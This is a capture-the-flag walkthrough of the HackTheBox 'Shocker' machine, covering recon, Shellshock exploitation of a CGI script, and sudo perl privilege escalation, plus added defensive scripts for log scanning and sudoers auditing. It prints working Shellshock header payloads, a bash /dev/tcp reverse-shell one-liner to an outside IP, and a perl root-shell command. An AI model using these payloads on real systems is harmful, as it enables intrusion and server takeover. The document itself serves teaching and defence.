HackTheBox Shocker Walkthrough
Enjoy reading my HTB Shocker Writeup
Information Gathering
Let's begin with a basic nmap scan to gain information about the services running on HTB Shocker.
sudo nmap -p 1-5000 -sV -sC -v 10.10.10.56
This reveals two services:
- Port 80: Apache httpd 2.4.18 (Ubuntu)
- Port 2222: OpenSSH 7.2p2
The website contains some basic HTML code to display an image, nothing else.
Using gobuster we can search for hidden directories and files:
gobuster dir -u http://10.10.10.56 -w Lists/gobuster/directory.txt
This didn't return any directories, and gobuster had some errors displaying custom status codes, so I switched to dirbuster.
Dirbuster then revealed the /cgi-bin/ directory, which answered with a 403 (Forbidden), so we cannot access it directly.
Now that we know the directory exists, let's brute-force file names inside it with common extensions instead of relying on an index, using gobuster or dirbuster:
gobuster dir -u http://10.10.10.56/cgi-bin/ -x txt,sh,pl,tar.gz,bak -w /Lists/gobuster/directory.txt
Through that I found a file called user.sh with the following content:
Content-Type: text/plain

Just an uptime test script

 18:51:55 up 53 min, 0 users, load average: 1.16, 0.68, 0.35
ShellShock
Shellshock is a vulnerability in GNU Bash disclosed in September 2014: Bash executed any commands appended to a function definition passed in an environment variable, which allows arbitrary code execution on servers that hand request data to Bash, for example through CGI scripts.
As we have a bash script lying on the webserver and the box is called Shocker, this host might be vulnerable to CVE-2014-6271.
nmap's scripting engine contains a script (http-shellshock.nse) which we are going to use for further investigation.
With nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56
we can let nmap check whether the target is vulnerable or not.
According to nmap it should be exploitable:
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
I configured a redirect in Burp Suite to take a look at the exact request made by nmap and the response of the webserver.
nmap puts the payload into the User-Agent, Cookie and Referer headers; as we only need one of them, I removed Cookie and Referer to keep the request a bit cleaner.
I then rewrote the payload to: () { :;}; echo; ls
which resulted in a 200 but didn't output anything.
Changing ls to /bin/ls then worked, most likely because the injected command runs without a usable PATH, so binaries need their absolute path.
Using ls you are able to navigate through the filesystem, and with the following payload you can read the user flag:
User-Agent: () { :;}; echo; /bin/cat ../../../home/shelly/user.txt
Another option is to get a foothold first by spawning a reverse shell; this can be done with this payload:
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.16.180/4545 0>&1
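From the defender's side, every probe above leaves the same fingerprint in the web server log: a header value that starts with the bash function-definition prefix "() {". The following scanner is an added example written for this writeup (not part of the original post or of any tool it mentions). It parses Apache's default "combined" log format, flags Referer and User-Agent values carrying that prefix, and extracts the command bash would have executed; the log lines are constructed to mirror the requests shown above, not a real capture.

```python
"""Scan Apache combined-format access logs for Shellshock (CVE-2014-6271) probes.

Added example for this writeup, not part of the original post or any project.
Assumes the default Apache "combined" LogFormat, which records only the
Referer and User-Agent headers; the sample lines below are constructed.
"""
import re

# Constructed sample lines (not a real capture). Two carry the
# "() { :;};" function-definition prefix that triggers Shellshock.
SAMPLE_LOG = """\
10.10.16.180 - - [01/Jan/2024:18:51:55 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; /bin/ls"
10.10.16.180 - - [01/Jan/2024:18:52:10 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.16.180 - - [01/Jan/2024:18:52:30 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :;}; echo; /bin/cat ../../../home/shelly/user.txt" "curl/7.68.0"
10.10.16.181 - - [01/Jan/2024:18:53:00 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Shellshock trigger is the exported-function definition "() {" in an
# environment variable value. Whitespace between the tokens varies between
# probes, so the pattern is deliberately loose; legitimate User-Agent strings
# never contain it.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock(value):
    """True if a header value carries the bash function-definition trigger."""
    return bool(SHELLSHOCK_RE.search(value))


def injected_command(value):
    """Return the text after the function body, i.e. what vulnerable bash would run."""
    m = re.search(r'\}\s*;?\s*(.*)$', value)
    return m.group(1).strip() if m else value


def scan_log(text):
    """Return one finding per logged header that looks like a Shellshock probe."""
    findings = []
    for line in text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        for header, field in (("User-Agent", "ua"), ("Referer", "referer")):
            if is_shellshock(rec[field]):
                findings.append({
                    "ip": rec["ip"],
                    "time": rec["ts"],
                    "request": rec["request"],
                    "header": header,
                    "command": injected_command(rec[field]),
                    # CGI paths are where the injected value reaches bash.
                    "cgi": "/cgi-bin/" in rec["request"],
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['header']}: {f['command']!r} -> {f['request']}")
```

The caveat a practitioner should keep in mind: the combined format only records two headers, so a probe placed in Cookie (one of the three headers nmap's script uses) would not show up here at all. Catching every variant needs either a LogFormat that records more headers or inspection at the web-application firewall layer; patching bash removes the issue regardless of which header is used.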
Privilege Escalation
After obtaining the reverse shell I checked whether there are executables that we are allowed to run as root without a password, using: sudo -l
shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
perl can be used for escalating our privileges (see GTFOBins), e.g. with: sudo perl -e 'exec "/bin/bash";'
Finally, you are able to navigate into the root directory and take a look at the system flag.
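The root cause here is a sudoers rule, and the same "sudo -l" output an attacker reads can be audited by the administrator. Below is an added example written for this writeup (not part of the original post or any project): it parses the rule listing, and flags passwordless root entries whose target is an interpreter or editor that can execute arbitrary commands, which makes such a rule equivalent to a root shell. The sample text reproduces the entry shown above plus two constructed entries for contrast; the set of shell-capable binaries is a small, hand-picked subset, not a complete list.

```python
"""Audit "sudo -l" output for passwordless rules that amount to a root shell.

Added example for this writeup, not part of the original post or any project.
The sample text is constructed: the perl entry mirrors the writeup, the other
two entries are made up to show the different verdicts.
"""
import os
import re

SAMPLE_SUDO_L = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/apt-get
    (ALL) NOPASSWD: /usr/bin/id
"""

# Interpreters and editors that run arbitrary commands once started as root.
# Hand-picked subset for the example; extend from your own baseline.
SHELL_CAPABLE = {"perl", "python", "python3", "ruby", "bash", "sh",
                 "vim", "vi", "less", "more", "awk", "find"}

# One rule line: "(runas) TAG: TAG: /path/one, /path/two"
ENTRY_RE = re.compile(
    r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)


def parse_sudo_l(text):
    """Return one dict per command listed after the 'may run' banner."""
    entries = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.strip(": ") for t in m.group("tags").split() if t.strip()}
        # sudo lists several commands of one rule separated by commas.
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                entries.append({
                    "runas": m.group("runas").strip(),
                    "nopasswd": "NOPASSWD" in tags,
                    "command": cmd,
                })
    return entries


def risk(entry):
    """Classify a rule by how directly it hands out root."""
    binary = os.path.basename(entry["command"].split()[0])
    as_root = entry["runas"] in ("root", "ALL")
    if entry["nopasswd"] and as_root and binary in SHELL_CAPABLE:
        return "root shell without password"
    if entry["nopasswd"] and as_root:
        return "root command without password"
    return "review"


def audit(text):
    """Parse and classify every rule in a 'sudo -l' listing."""
    return [dict(e, risk=risk(e)) for e in parse_sudo_l(text)]


if __name__ == "__main__":
    for e in audit(SAMPLE_SUDO_L):
        flag = "NOPASSWD" if e["nopasswd"] else "password"
        print(f"({e['runas']}) {flag:8} {e['command']:<22} -> {e['risk']}")
```

On the box this prints "root shell without password" for /usr/bin/perl, which is exactly the one-liner used above. The fix is to remove the NOPASSWD rule for the interpreter (or, if perl really must run as root, to restrict it to a specific script and arguments); the "root command without password" verdict for a non-interactive binary like /usr/bin/id is low risk but still worth a look, and unmatched lines such as the Defaults block are ignored.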
Tags:
HTB, HackTheBox, Shocker, Walkthrough